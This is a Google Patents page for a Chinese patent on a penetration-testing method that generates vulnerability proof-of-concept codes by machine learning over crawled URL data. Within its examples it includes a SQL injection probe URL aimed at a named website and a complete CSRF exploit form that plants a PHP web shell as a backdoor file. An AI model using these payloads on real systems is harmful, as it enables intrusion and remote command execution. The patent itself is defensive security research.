CN106874768B - Penetration test method and device - Google Patents
Penetration test method and device Download PDFInfo
- Publication number
- CN106874768B CN106874768B CN201611255209.8A CN201611255209A CN106874768B CN 106874768 B CN106874768 B CN 106874768B CN 201611255209 A CN201611255209 A CN 201611255209A CN 106874768 B CN106874768 B CN 106874768B
- Authority
- CN
- China
- Prior art keywords
- data stream
- vulnerability
- data
- poc
- scanning
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06N—COMPUTING ARRANGEMENTS BASED ON SPECIFIC COMPUTATIONAL MODELS
- G06N20/00—Machine learning
Abstract
The embodiment of the invention provides a method and a device for penetration testing, which relate to the field of code auditing and comprise the following steps: acquiring a link data stream to be tested; carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream; and outputting a first vulnerability scanning result. According to the scheme of the embodiment of the invention, the POC in the leak library is updated through machine learning, and the continuously updated leak library is utilized to carry out leak scanning on the data stream to be tested so as to meet the demand of searching for the leaks in various forms.
Description
Technical Field
The embodiment of the invention relates to the field of code auditing, in particular to a penetration testing method and device.
Background
Code auditing, as its name implies, examines the source code for defects and error information, analyzes and finds security holes caused by these problems, and provides code revision measures and recommendations for an in-depth problem finding and destruction process during the system development/operation and maintenance phase. The penetration test is a key link for vulnerability search and repair of the code in code audit.
The existing penetration testing process mainly uses a manual mode to observe a source code data stream to be tested (hereinafter referred to as "data stream"), and searches possible bugs in the data stream according to the professional level and experience of a programmer. Of course, there is also a vulnerability discovery method that is automated using a vulnerability verification code (POC).
In the process of implementing the invention, the inventor finds that the prior art has the following defects:
the vulnerability is searched manually, a large amount of manpower is consumed, time is consumed, and the testing efficiency is low; the existing POC vulnerability searching method can save labor, but only a single vulnerability can be searched, and the requirement for searching vulnerabilities in various forms cannot be met.
Disclosure of Invention
The embodiment of the invention provides a penetration testing method and device, which updates POC in a leak library through machine learning, and performs leak scanning on a data stream to be tested by using the continuously updated leak library so as to meet the demand of searching for leaks with diversified forms.
In order to achieve the above object, an embodiment of the present invention provides a method for penetration testing, including: acquiring a link data stream to be tested; carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream; and outputting a first vulnerability scanning result.
The embodiment of the invention provides a device for penetration test, which comprises: the data acquisition module is used for acquiring a link data stream to be tested; the first vulnerability scanning module is used for carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream; and the vulnerability output module is used for outputting the first vulnerability scanning result.
According to the penetration testing method and device, the leak library capable of continuously and automatically updating the POC is utilized, and the updated POC is obtained after the historical data stream is subjected to machine learning, so that more diversified and complex leaks can be found out when the data stream to be tested is subjected to leak scanning.
The foregoing description is only an overview of the technical solutions of the present invention, and the embodiments of the present invention are described below in order to make the technical means of the present invention more clearly understood and to make the above and other objects, features, and advantages of the present invention more clearly understandable.
Drawings
FIG. 1 is a first flowchart of a penetration testing method provided in an embodiment of the present invention;
FIG. 2 is a block diagram of a flow chart of a penetration test provided by an embodiment of the present invention;
FIG. 3 is a flow chart of a penetration testing method provided in an embodiment of the present invention;
FIG. 4 is a first schematic structural diagram of a penetration testing apparatus according to an embodiment of the present invention;
FIG. 5 is a schematic structural diagram of a penetration testing apparatus according to an embodiment of the present invention;
FIG. 6 is a schematic structural diagram of a data learning module according to an embodiment of the present invention;
fig. 7 is a schematic structural diagram of a data acquisition module according to an embodiment of the present invention.
Detailed Description
Exemplary embodiments of the present disclosure will be described in more detail below with reference to the accompanying drawings. While exemplary embodiments of the present disclosure are shown in the drawings, it should be understood that the present disclosure may be embodied in various forms and should not be limited to the embodiments set forth herein. Rather, these embodiments are provided so that this disclosure will be thorough and complete, and will fully convey the scope of the disclosure to those skilled in the art.
Example one
Fig. 1 is a flowchart of a first method for penetration testing according to an embodiment of the present invention, where an execution subject of the method may be a terminal or a server having a penetration testing function. As shown in fig. 1, the method of penetration testing comprises the following steps:
s110, acquiring a link data stream to be tested;
a link is also called a hyperlink, and the hyperlink refers to a connection relationship pointing from a web page to a target, and an object used for the hyperlink in a web page may be a piece of text or a picture, and when a browser clicks on the linked text or picture, the link target is displayed on the browser and opened or operated according to the type of the target. Hyperlinks on web pages are typically implemented using Uniform Resource Locators (URLs).
The link data stream (hereinafter referred to as "data stream") in this embodiment may be understood as a set of all data packets required to be transmitted in the process of completing a link, where, taking a web link as an example, the data stream corresponding to the link may be all data packets included in URL data for requesting the link.
Specifically, when URL data is used as the data stream to be tested, the URL data stream may be obtained by:
step 1, inputting a specified domain name IP in an address bar to carry out webpage linking, and acquiring URL data of a target webpage through a crawler technology, for example, inputting an IP address of the target webpage in the address bar of a webpage browser, then carrying out webpage linking, and in the linking process, capturing URL data of a target webpage which is jumped from a current webpage request through the crawler technology, and recording the URL data as URL data of the target webpage.
And 2, performing fingerprint identification comparison on the URL data to remove repeated URL data. Specifically, after a large amount of URL data is captured by the web crawler, repeated data may exist in the URL data, so that the repeated URL data is removed by performing fingerprint identification comparison on all the acquired URL data, so as to reduce unnecessary workload.
S120, vulnerability scanning is carried out on the data stream through a preset vulnerability library; the vulnerability database stores a plurality of vulnerability verification codes POC for verifying that the data stream has vulnerabilities, and the POCs are obtained by performing machine learning on the historical data stream.
In this embodiment, based on the prior art, a vulnerability database including multiple pieces of POC is pre-established in a manner that vulnerability verification codes POC automatically perform vulnerability verification, and vulnerability scanning is performed on a data stream through the vulnerability database. Specifically, when vulnerability scanning is executed, the data stream to be tested is verified one by one through each POC in the vulnerability database, and if the verification is passed, it is determined that a vulnerability exists in the data stream. By POC authentication pass, it is meant that the POC code program can be successfully executed once when authenticating the data stream, and if the POC code program is not successfully executed, it is marked as POC authentication fail.
Unlike the prior art, the POC in the leak library for verifying data streams in the present embodiment is continuously updated, and the updated POC is obtained by performing machine learning on the historical data streams. The historical data stream refers to a data stream corresponding to each test in the past time. Specifically, the method steps for generating POC through machine learning of the historical data stream will be described in detail in the embodiment corresponding to fig. 2.
S130, outputting a first vulnerability scanning result.
The first vulnerability scanning result refers to test result data formed after a test is performed on the data stream to be tested each time, and the test result data may include test time and a data stream part with a vulnerability, such as a request data packet, a parameter value, an address and other data stream parts with a vulnerability in the URL data.
For example, the following is URL data with a vulnerability:
http://www.ftcredit.com/news.asp?fenlei=5
and determining, by means of hole scanning, that fenlei is 5, which is a data stream part triggering a hole, and the data stream part may be included in the first hole scanning result, and may also include the whole URL data where the data stream part is located.
In addition, in the first vulnerability scanning result, categories to which each vulnerability belongs may be further labeled, and the categories of vulnerabilities may include:
1. injecting vulnerabilities including Structured Query Language (SQL), operating system and Lightweight Directory Access Protocol (LDAP) injection, etc.
2. Problematic authentication and session management.
3. Cross site scripting attack (XSS).
4. Unsecured direct object references.
5. A security configuration error.
6. Exposing the sensitive data.
7. Function level access control is missing.
8. Cross-site request forgery (CSRF).
9. Components that have known vulnerabilities are used.
10. An unverified redirect.
The vulnerabilities can also be graded according to their different impact ranges and impact degrees.
According to the penetration testing method, the preset leak library is used for carrying out leak scanning on the data stream to be tested so as to determine the leak existing in the data stream, the POC in the leak library can be continuously updated, and the updated POC is obtained after machine learning is carried out on the historical data stream, so that more diversified and complex leaks can be found out when the leak scanning is carried out on the data stream to be tested.
Example two
In the penetration testing method shown in fig. 1, the constantly updated POC vulnerability database plays a key role in the whole testing process, which provides a premise for finding out more diversified and complex vulnerabilities.
Fig. 2 shows a flow framework diagram of updating POC in the leak library during the penetration test, as shown in fig. 2, the whole penetration test is roughly divided into three parts, i.e., acquiring a data stream, performing vulnerability scanning on the data stream, and learning the data stream to form POC.
Specifically, the IP address/domain name can be typed in the address input field, original URL data are obtained through a crawler technology, fingerprint identification is carried out on the original URL data to remove repeated URL data, and finally the rest URL data are used as a data stream to be tested; automatically scanning the data stream to be tested for vulnerabilities by using a vulnerability library to generate a vulnerability scanning result, wherein the result can contain a data part with vulnerabilities; and based on the vulnerability scanning result, the original data stream is subjected to vulnerability rule learning to form a new POC, and the new POC is added into the vulnerability database, so that the vulnerability searching capability of the vulnerability database is enhanced. Of course, for the bugs found after the bug scan, bug fixing may also be performed on the bugs.
Based on the idea of flow framework for updating POC in the leak library in the penetration test process shown in fig. 2, the embodiment shown in fig. 3 shows a specific method for updating POC in the leak library, which includes the following steps:
s310, extracting first data streams except for the data stream part with the vulnerability from the original data stream, and performing machine learning to generate a second data stream with a potential vulnerability;
specifically, after vulnerability scanning is performed on the data stream to be tested each time and the data stream part with the vulnerability is determined, the remaining data stream part except the data stream part with the vulnerability in the original data stream is marked as a first data stream. The first data stream is then extracted from the original data stream for machine learning to generate a second data stream with potential vulnerabilities.
In the actual testing process, the POC for searching for the corresponding vulnerability naturally exists in the vulnerability database in the data stream part determined to have the vulnerability. However, in the original data stream, the data stream part in which the vulnerability is not detected, and there may be the following reasons: no loopholes exist in the data stream; alternatively, holes do exist in the data stream, but the holes cannot be found according to the POC in the current hole library (i.e. there is no POC in the hole library for finding the holes). Therefore, in order to extend the scope of vulnerability library discovery vulnerabilities, machine learning of potentially undiscovered vulnerability data in the original data stream is required to highlight these vulnerable data stream portions.
Specifically, the first data stream may be subjected to machine learning to generate a derivative data stream similar to the first data stream and of the same category as the second data stream, and the vulnerabilities of the pair of data streams may be more obvious and may be more easily found through the current vulnerability library. When the second data streams are detected to have the bugs, whether the bugs are stored in the first data stream can be further determined in a targeted manner through other verification methods.
As mentioned in the foregoing, similar to the URL data, the request packet, the parameter value, the address, and other content data generally exist in one link data stream, and the present embodiment defines these content data as parameter contents in the data stream. Further, the parameter content in the first data stream is defined as the first parameter content.
For example, the following URL data is taken as the first data stream:
http://www.ftcredit.com/news.asp?fenlei=9
and performing machine learning on the first data stream to generate a second data stream with a similar data structure, wherein the second data stream may have obvious bugs and can be searched by a current bug library.
Specifically, the second data stream may be generated by:
step 1, performing category learning on first parameter content in a first data stream through a naive Bayes algorithm to generate a plurality of second parameter content of the same category as the first parameter content. For example, the URL datafenlei=9(corresponding to the first parameter content), performing category learning through a naive Bayes algorithm, and generating a plurality of second parameter contents which are the same as the first parameter contents, such as:
fenlei=1
fenlei=2
……
and 2, replacing the first parameter content in the original first data stream with the corresponding second parameter content to form a second data stream.
For example, the URL datafenlei=9Replacing the newly generated second parameter contentfenlei=1、fenlei=2… …, thereby forming a plurality of second data streams having the form:
http://www.ftcredit.com/news.asp?fenlei=1
http://www.ftcredit.com/news.asp?fenlei=2
……
of course, when actually generating the second parameter content, the generated parameter content may be more diversified as needed.
S320, scanning the vulnerability of the second data stream through the vulnerability library to determine a part of the second data stream with the vulnerability;
the formed second data streams are subjected to vulnerability scanning through a vulnerability library one by one, and the vulnerability of the second data streams generated after the first data streams are derived can be more obvious, so that the existing vulnerability can be easily detected through the existing POC. When a vulnerability is detected in a plurality of second data streams generated after a certain first data stream is derived, it is indicated that the original first data stream is likely to have the vulnerability, and at this time, vulnerability verification in other manners, such as manual experience judgment and the like, can be performed on the first data stream. When it is finally determined that the first data stream does have a vulnerability, it is further proved that the POC function in the current vulnerability library is not complete enough, and a POC update needs to be performed on the vulnerability library, for example, a function update is performed on the current existing POC, or a new POC is produced and added to the vulnerability library.
For example, the second data stream in the above example is scanned for vulnerabilities:
http://www.ftcredit.com/news.asp?fenlei=[0-9]+and(select count(*)
from sysobj ects)>=O
wherein, "[ 0-9 ]" represents any value from 0 to 9, and the code content after "and" is whether sysobijects data exist in the query data table, if so, a return true (indicating that the vulnerability scanning verification passes and a vulnerability exists in the second data stream) does not exist, and if not, a return false (indicating that the vulnerability scanning verification fails and a vulnerability does not exist in the second data stream) does not exist.
And S330, generating corresponding POC according to the part of the second data stream with the vulnerability, and adding the POC into the vulnerability database.
A generic version of POC generated from Cross-Site Request Forgery (CSRF) vulnerabilities is shown as follows:
-Create File by CSRF Exploit-
<html>
<body onload="document.form.submit();">
<form action="http://[target]/pligg/admin/admin_editor.php"method="post"name="form"
>
<input type="hidden"name="updatedfile"value="<?php system($_REQUEST['cmd']);?>
">
<input type="hidden"name="the_file2"value="/var/www/html/pligg/backd00r.php">
<input type="hidden"name="isempty"value="1">
<input type="hidden"name="save"value="Save+Changes">
</form>
</body>
</html>
wherein, the parameter content is: the values of "hidden", "action", "name", "value" can be changed by modifying the storage path of the parameter.
Since the derived second data streams usually include all the situations of the vulnerability of the type, the corresponding POC can be generated according to the tested part of the second data streams with the vulnerability and added to the vulnerability library, so that the capability of the strong vulnerability library to search for diversified vulnerabilities is enhanced.
As a necessary premise for executing the steps of the method in the first embodiment of the present invention, the method for updating POC in a vulnerability database according to the embodiment of the present invention performs machine learning on a first data stream in an original data stream to generate a second data stream, then performs vulnerability scanning on the second data stream to find vulnerabilities of the second data stream, writes POC according to the vulnerabilities, and adds the POC to the vulnerability database, thereby enhancing the capability of the vulnerability database to find diversified vulnerabilities.
EXAMPLE III
Fig. 4 is a schematic diagram of a first apparatus for penetration testing according to an embodiment of the present invention, which may be used to perform the method steps shown in fig. 1. As shown in fig. 4, the apparatus for the penetration test includes: data acquisition module 410, first vulnerability scanning module 420 and vulnerability output module 430, wherein:
a data acquisition module 410, configured to acquire a link data stream to be tested; the first vulnerability scanning module 420 is configured to perform vulnerability scanning on the data stream through a preset vulnerability database; the vulnerability database stores a plurality of vulnerability verification codes POC for verifying that the data stream has vulnerabilities, and the POC is obtained by machine learning of the historical data stream; the vulnerability output module 430 is configured to output a first vulnerability scanning result.
According to the penetration testing device, the preset leak library is used for carrying out leak scanning on the data stream to be tested so as to determine the leak existing in the data stream, the POC in the leak library can be continuously updated, and the updated POC is obtained after machine learning is carried out on the historical data stream, so that more diversified and complex leaks can be found out when the leak scanning is carried out on the data stream to be tested.
Example four
Fig. 5 is another specific structure of the apparatus for penetration testing provided in this embodiment, which includes all the modules of the apparatus shown in fig. 4, and adds a functional module for updating POC in the leak library on the basis of the module, including: data learning module 440, second vulnerability scanning module 450, and POC generating module 460, which are operable to perform the method steps shown in fig. 3, as shown in fig. 5, based on the structure shown in fig. 4:
the first vulnerability scanning module 420 is specifically configured to verify the data stream one by one through each POC in the vulnerability database, and if the data stream passes the verification, determine that a vulnerability exists in the data stream.
Further, the vulnerability scanning result includes: the portion of the data stream where the vulnerability exists.
On this basis, the data learning module 440 may be configured to extract, from the original data stream, a first data stream except for the data stream portion with the bug, perform machine learning, and generate a second data stream with a potential bug; the second vulnerability scanning module 450 may be configured to perform vulnerability scanning on the second data stream through the vulnerability database to determine a portion of the second data stream in which a vulnerability exists; the POC generating module 460 is configured to generate a corresponding POC according to the part of the second data stream with the vulnerability, and add the POC to the vulnerability database.
Further, as shown in fig. 6, the data learning module 440 may specifically include:
the category learning unit 441 is configured to perform category learning on first parameter content in the first data stream through a naive bayes algorithm, and generate a plurality of second parameter content of the same category as the first parameter content; the data forming unit 442 is configured to replace the first parameter content in the original first data stream with the corresponding second parameter content to form a second data stream.
Further, the data stream may be URL data;
correspondingly, as shown in fig. 7, the data acquisition module 410 may specifically include:
a data obtaining unit 411, configured to input a specified domain name IP in an address bar to perform web page linking, and obtain URL data of a target web page through a crawler technology; and a data deduplication unit 412, configured to perform fingerprinting comparison on the URL data to remove duplicate URL data.
In the penetration testing device provided by the embodiment of the invention, the function module for updating the POC in the leak library is added, the second data stream is generated by performing machine learning on the first data stream in the original data stream, then vulnerability scanning is performed on the second data stream, the vulnerability of the second data stream is searched, the POC is compiled according to the vulnerabilities, and the POC is added into the leak library, so that the capability of the leak library for searching diversified vulnerabilities is enhanced.
Through the above description of the embodiments, those skilled in the art will clearly understand that each embodiment can be implemented by software plus a necessary general hardware platform, and certainly can also be implemented by hardware. With this understanding in mind, the above-described technical solutions may be embodied in the form of a software product, which can be stored in a computer-readable storage medium such as ROM/RAM, magnetic disk, optical disk, etc., and includes instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to execute the methods described in the embodiments or some parts of the embodiments.
Finally, it should be noted that: the above embodiments are only used to illustrate the technical solution of the present invention, and not to limit the same; while the invention has been described in detail and with reference to the foregoing embodiments, it will be understood by those skilled in the art that: the technical solutions described in the foregoing embodiments may still be modified, or some or all of the technical features may be equivalently replaced; and the modifications or the substitutions do not make the essence of the corresponding technical solutions depart from the scope of the technical solutions of the embodiments of the present invention.
Claims (6)
1. A method of penetration testing, comprising:
acquiring a link data stream to be tested;
carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream;
outputting the result of the first bug scan,
through a preset leak library, performing leak scanning on the data stream comprises:
verifying the data stream by each POC in the vulnerability database one by one, if the verification is passed, determining that the vulnerability exists in the data stream,
the vulnerability scanning result comprises: a data stream portion in which a vulnerability exists;
the method further comprises the following steps:
extracting a first data stream except the data stream part with the vulnerability from the original data stream, and performing machine learning to generate a second data stream with a potential vulnerability;
performing vulnerability scanning on the second data stream through the vulnerability library to determine a part of the second data stream with the vulnerability, and determining whether the vulnerability is stored in the first data stream when the second data stream is detected to have the vulnerability;
and generating corresponding POC according to the part of the second data stream with the vulnerability, and adding the POC into the vulnerability database.
2. The method of claim 1, wherein extracting, in the original data stream, a first data stream except for the data stream portion with the vulnerability, and performing machine learning to generate a second data stream with a potential vulnerability comprises:
performing category learning on first parameter content in the first data stream through a naive Bayes algorithm to generate a plurality of second parameter content of the same category as the first parameter content;
and replacing the first parameter content in the original first data stream with the corresponding second parameter content to form the second data stream.
3. The method according to claim 1 or 2, wherein the data stream is uniform resource locator, URL, data,
the acquiring the link data stream to be tested comprises the following steps:
inputting a specified domain name IP in an address bar to link a webpage, and acquiring URL data of a target webpage through a crawler technology;
and carrying out fingerprint identification comparison on the URL data to remove repeated URL data.
4. An apparatus for permeation testing, comprising:
the data acquisition module is used for acquiring a link data stream to be tested;
the first vulnerability scanning module is used for carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream;
a vulnerability output module for outputting a first vulnerability scanning result,
the first vulnerability scanning module is specifically configured to verify the data stream one by one through each POC in the vulnerability database, and if the verification is passed, determine that a vulnerability exists in the data stream,
the vulnerability scanning result comprises: a data stream portion in which a vulnerability exists;
the system further comprises:
the data learning module is used for extracting a first data stream except the data stream part with the vulnerability from the original data stream, and performing machine learning to generate a second data stream with a potential vulnerability;
the second vulnerability scanning module is used for carrying out vulnerability scanning on the second data stream through the vulnerability library so as to determine a part of the second data stream with vulnerabilities, and when the second data stream is detected to have vulnerabilities, whether the vulnerabilities are stored in the first data stream is determined;
and the POC generating module is used for generating corresponding POC according to the part of the second data stream with the vulnerability and adding the POC into the vulnerability database.
5. The apparatus of claim 4, wherein the data learning module specifically comprises:
the class learning unit is used for carrying out class learning on the first parameter content in the first data stream through a naive Bayesian algorithm to generate a plurality of second parameter contents which are the same as the first parameter content in class;
and the data forming unit is used for replacing the first parameter content in the original first data stream with the corresponding second parameter content to form the second data stream.
6. The apparatus according to claim 4, wherein the data stream is URL data, and the data collection module specifically includes:
the data acquisition unit is used for inputting a specified domain name IP in an address bar to link a webpage and acquiring URL data of a target webpage through a crawler technology;
and the data deduplication unit is used for carrying out fingerprint identification comparison on the URL data so as to remove duplicated URL data.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201611255209.8A CN106874768B (en) | 2016-12-30 | 2016-12-30 | Penetration test method and device |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201611255209.8A CN106874768B (en) | 2016-12-30 | 2016-12-30 | Penetration test method and device |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN106874768A CN106874768A (en) | 2017-06-20 |
| CN106874768B true CN106874768B (en) | 2020-03-24 |
Family
ID=59165260
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201611255209.8A Active CN106874768B (en) | 2016-12-30 | 2016-12-30 | Penetration test method and device |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN106874768B (en) |
Families Citing this family (12)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN108573155B (en) * | 2018-04-18 | 2020-10-16 | 北京知道创宇信息技术股份有限公司 | Method and device for detecting vulnerability influence range, electronic equipment and storage medium |
| CN108540491B (en) * | 2018-04-27 | 2020-06-30 | 四川长虹电器股份有限公司 | Semi-automatic penetration testing system and method based on passive scanning |
| CN109413054A (en) * | 2018-10-10 | 2019-03-01 | 四川长虹电器股份有限公司 | The formation gathering method at penetration testing auxiliary system and penetration testing initial stage |
| CN110059007B (en) * | 2019-04-03 | 2020-12-22 | 奇安信科技集团股份有限公司 | System vulnerability scanning method and device, computer equipment and storage medium |
| CN110049055A (en) * | 2019-04-24 | 2019-07-23 | 北京国舜科技股份有限公司 | Business loophole means of defence, device and system |
| CN110417800A (en) * | 2019-08-05 | 2019-11-05 | 杭州安恒信息技术股份有限公司 | The detection method and device of LDAP injection loophole |
| CN110866607B (en) * | 2019-09-16 | 2023-08-11 | 国网河北省电力有限公司电力科学研究院 | Permeation behavior prediction algorithm based on machine learning |
| CN110929267A (en) * | 2019-11-29 | 2020-03-27 | 深信服科技股份有限公司 | Code vulnerability detection method, device, equipment and storage medium |
| CN113162892B (en) * | 2020-01-23 | 2022-12-06 | 北京华顺信安科技有限公司 | POC verification environment rapid generation method, readable medium and equipment |
| CN111343188A (en) * | 2020-03-05 | 2020-06-26 | 深信服科技股份有限公司 | Vulnerability searching method, device, equipment and storage medium |
| CN111817908B (en) * | 2020-05-25 | 2021-09-24 | 北京华云安信息技术有限公司 | Node penetration testing method and device based on reinforcement learning and storage medium |
| CN111865997B (en) * | 2020-07-24 | 2023-10-27 | 光通天下网络科技股份有限公司 | WEB vulnerability detection method, device, equipment and medium based on passive traffic |
Family Cites Families (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104065645A (en) * | 2014-05-28 | 2014-09-24 | 北京知道创宇信息技术有限公司 | Web vulnerability protection method and apparatus |
| CN105912381B (en) * | 2016-04-27 | 2019-08-30 | 华中科技大学 | A kind of compiling duration code security detection method in rule-based library |
| CN106169050B (en) * | 2016-08-02 | 2019-03-08 | 中国科学院软件研究所 | A kind of PoC Program extraction method based on webpage Knowledge Discovery |
-
2016
- 2016-12-30 CN CN201611255209.8A patent/CN106874768B/en active Active
Also Published As
| Publication number | Publication date |
|---|---|
| CN106874768A (en) | 2017-06-20 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN106874768B (en) | Penetration test method and device | |
| Gupta et al. | XSS-secure as a service for the platforms of online social network-based multimedia web applications in cloud | |
| Lee et al. | A novel method for SQL injection attack detection based on removing SQL query attribute values | |
| CN107370763B (en) | Asset safety early warning method and device based on external threat information analysis | |
| Fonseca et al. | Testing and comparing web vulnerability scanning tools for SQL injection and XSS attacks | |
| Gupta et al. | PHP-sensor: a prototype method to discover workflow violation and XSS vulnerabilities in PHP web applications | |
| Fonseca et al. | Evaluation of web security mechanisms using vulnerability & attack injection | |
| Wei et al. | Preventing SQL injection attacks in stored procedures | |
| US20170270303A1 (en) | Integrated Interactive Application Security Testing | |
| US8943588B1 (en) | Detecting unauthorized websites | |
| KR101001132B1 (en) | Method and System for Determining Vulnerability of Web Application | |
| Balduzzi et al. | Automated Discovery of Parameter Pollution Vulnerabilities in Web Applications. | |
| CN107896219B (en) | Method, system and related device for detecting website vulnerability | |
| CN105760379B (en) | Method and device for detecting webshell page based on intra-domain page association relation | |
| CN113342639B (en) | Applet security risk assessment method and electronic device | |
| Rocha et al. | Etssdetector: A tool to automatically detect cross-site scripting vulnerabilities | |
| CN111104579A (en) | Identification method and device for public network assets and storage medium | |
| EP3433782B1 (en) | Integrated interactive application security testing | |
| CN104123497A (en) | SQL injection prevention method, device and system | |
| Gupta et al. | An infrastructure-based framework for the alleviation of JavaScript worms from OSN in mobile cloud platforms | |
| CN105488400A (en) | Comprehensive detection method and system of malicious webpage | |
| Nagpal et al. | SECSIX: security engine for CSRF, SQL injection and XSS attacks | |
| CN108322420B (en) | Method and device for detecting backdoor file | |
| US20210092144A1 (en) | Http log integration to web application testing | |
| Ibrahim et al. | Penetration testing using SQL injection to recognize the vulnerable point on web pages |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |